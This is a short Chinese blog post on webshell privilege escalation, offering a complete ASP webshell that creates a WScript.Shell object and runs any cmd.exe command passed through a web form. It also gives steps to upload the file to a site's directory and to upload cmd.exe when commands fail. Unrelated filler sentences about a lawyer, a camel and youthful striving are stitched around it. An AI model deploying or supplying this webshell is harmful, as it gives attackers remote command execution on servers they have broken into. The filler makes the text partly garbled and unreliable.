webshell提权经验分享

从来没见过这么漂亮的女律师,做你的当事人一定会很幸福。学会坚强,做一只沙漠中永不哭泣的骆驼!
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
把下面代码复制:

复制代码
代码如下:

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if
response.write("<textarea readonly cols=80 rows=20>")
On Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
response.write("<form method='post'>")
response.write("<input type=text name='c' size=60>
")
response.write("<input type=submit value='执行'></form>")
%>

保存为一个asp文件,然后传到网站目录上去
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
我用此成功运行过cacls命令。

第二那就是运行时出错,可能限制某些代码执行。

本文webshell提权经验分享到此结束。用我们的奋斗和梦想扬起青春的船帆,当我们努力拼搏地摇浆时,成功的闸门也会慢慢地再为我们打开,我们将享受一份青春的美好,收获一份成功的喜悦。小编再次感谢大家对我们的支持!

您可能有感兴趣的文章
PHP一句话Webshell变形总结

MSSQL 2005 入侵提权过程分享

防止SQL注入攻击的一些方法小结

PoisonIvy Rat 远程溢出实战

PHP木马大全 一句话的PHP木马的防范